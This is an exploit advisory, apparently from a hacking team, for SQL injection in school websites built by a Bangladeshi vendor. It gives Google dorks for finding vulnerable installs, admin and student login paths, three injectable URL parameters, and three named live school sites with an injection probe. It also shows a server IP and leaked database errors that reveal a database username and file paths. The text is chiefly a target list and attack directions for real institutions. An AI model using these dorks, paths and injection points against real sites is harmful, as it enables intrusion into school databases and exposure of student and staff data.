#####################################################################
# Exploit Title : Sikder Computer Center Mathbaria Bangladesh SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 08/01/2019
# Vendor Homepage : sikdercomputer.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Design & Developed by Sikder Computer, Mathbaria'' site:edu.bd
intext:''Powered by Sikder Computer'' site:edu.bd
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
# Cyberizm Exploit Reference Link :
cyberizm.org/cyberizm-sikder-computer-center-mathbaria-bd-sql-injection.html?pid=182084#pid182084
#####################################################################
# Admin/Teacher/Student Panel Login Path :
***************************************
/PATH/admin/index
/PATH/students_panel/index
# SQL Injection Exploit :
***********************
[PATH]/view_gallery_meetings?page=[SQL Injection]
[PATH]/current_success_students_info?id=[SQL Injection]
[PATH]/ex_success_students_info?id=[SQL Injection]
#####################################################################
# Example Vulnerable Sites =>
*****************************
Note : (67.23.238.179) => There are 1,107 domains hosted on this server.
[+] sbss.edu.bd/sonar/view_gallery_meetings?page=1%27
[+] nalivimss.edu.bd/nali/view_gallery_meetings?page=1%27
[+] laylamalekia.edu.bd/layla/current_success_students_info?id=16%27
#####################################################################
# SQL Database Error :
*********************
Warning: mysql_connect(): Access denied for user 'nalivims_sms'@'localhost'
(using password: YES) in /home/nalivimssedu/public_html/nali/admin/config/config.php on line 3
Warning: mysql_select_db() expects parameter 2 to be resource, boolean given in
/home/nalivimssedu/public_html/nali/admin/config/config.php on line 5
Couldn't Connect to the database ***No database found ***
Warning: mysql_query(): Access denied for user ''@'localhost'
(using password: NO) in /home/nalivimssedu/public_html/nali/view_gallery_meetings.php on line 19
#####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#####################################################################